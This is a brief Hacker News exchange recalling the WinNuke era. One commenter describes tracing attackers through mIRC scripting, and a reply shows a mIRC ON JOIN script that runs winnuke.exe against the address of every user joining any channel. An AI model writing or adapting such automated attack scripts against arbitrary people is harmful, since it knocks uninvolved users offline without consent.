Hacker News new | ask | show | jobs
by eli 4094 days ago
I remember patching it and then scripting mirc to seek out the handle of the person who sent it via the source IP.
1 comments

I scripted mIRC to WinNuke everyone on join in all channels. Something like this:

    ON *:join:#: {
        /run c:\winnuke.exe $gettok($address,2,64)
    }